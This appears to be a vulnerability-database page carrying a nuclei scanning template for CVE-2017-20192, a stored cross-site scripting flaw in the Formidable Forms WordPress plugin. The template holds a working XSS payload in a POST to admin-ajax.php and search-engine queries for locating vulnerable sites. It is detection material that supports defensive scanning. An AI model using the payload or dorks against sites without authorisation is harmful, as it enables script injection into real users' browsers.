Lucene search
K

Formidable Forms < 2.05.02 - Cross-Site Scripting

🗓️ 11 Jun 2026 03:33:20Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 12 Views

Stored XSS in Formidable Forms before 2.05.03 due to insufficient after_html sanitization.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Cross-site Scripting in Strategy11 Formidable_Form_Builder
24 Dec 202504:34
githubexploit
Circl
CVE-2017-20192
24 Dec 202503:37
circl
CNNVD
WordPress plugin Formidable Form Builder 跨站脚本漏洞
16 Oct 202400:00
cnnvd
CVE
CVE-2017-20192
16 Oct 202406:43
cve
Cvelist
CVE-2017-20192 Formidable Form Builder < 2.05.03 - Unauthenticated Stored Cross-Site Scripting
16 Oct 202406:43
cvelist
EUVD
EUVD-2017-18910
7 Oct 202500:30
euvd
NVD
CVE-2017-20192
16 Oct 202407:15
nvd
Positive Technologies
PT-2024-10601
16 Oct 202400:00
ptsecurity
RedhatCVE
CVE-2017-20192
5 Feb 202518:16
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2017-20192
15 Oct 202400:00
vulncheck_kev
Rows per page
id: CVE-2017-20192

info:
  name: Formidable Forms < 2.05.02 - Cross-Site Scripting
  author: 0xanis
  severity: medium
  description: |
    Formidable Form Builder for WordPress versions before 2.05.03 contains a stored cross-site scripting caused by insufficient input sanitization and output escaping in form parameters like 'after_html', letting unauthenticated attackers inject and execute arbitrary scripts in victims' browsers
  impact: |
    Attackers can execute arbitrary scripts in users' browsers, potentially leading to session hijacking, defacement, or redirection.
  remediation: |
    Update to version 2.05.03 or later.
  reference:
    - https://klikki.fi/formidable-forms-vulnerabilities/
    - https://wordpress.org/plugins/formidable/
    - https://nvd.nist.gov/vuln/detail/CVE-2017-20192
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2017-20192
    epss-score: 0.24408
    epss-percentile: 0.96228
    cwe-id: CWE-79
    cpe: cpe:2.3:a:strategy11:formidable_forms:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="formidable" && body="wp-content/plugins"
    google-query: inurl:"wp-content/plugins/formidable"
  tags: cve,cve2017,wordpress,wp-plugin,formidable,xss,reflected,vkev

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=frm_forms_preview&before_html=<img src=x on[entry_key]error=alert(document.domain) />

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(header, "text/html")'
          - 'contains_all(body, "<img src=x onerror=alert(document.domain)")'
        condition: and
# digest: 4a0a00473045022100bb3f18f2a521200d80d2cdecc0e3f5d26bcf25fdf4761943dd0415275a602f9d0220766b7ea7e6b735c1f1d9a326ffb2923b8681b07a2dcb8c76928ea875f42de76b:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.5Medium risk
Vulners AI Score5.5
CVSS 3.16.1 - 8.3
EPSS0.24408
SSVC
12